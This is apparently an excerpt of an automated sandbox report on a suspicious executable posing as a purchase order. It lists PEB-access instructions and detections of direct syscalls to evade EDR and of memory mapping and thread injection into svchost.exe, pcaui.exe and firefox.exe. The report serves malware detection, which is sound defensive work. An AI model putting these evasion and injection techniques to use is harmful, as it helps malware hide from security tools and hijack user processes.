                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]2_2_03104940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0041A66C
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00408189 SetUnhandledExceptionFilter,0_2_00408189
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004081AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\pcaui.exeThread register set: target process: 2284Jump to behavior
                Queues an APC in another process (thread injection)
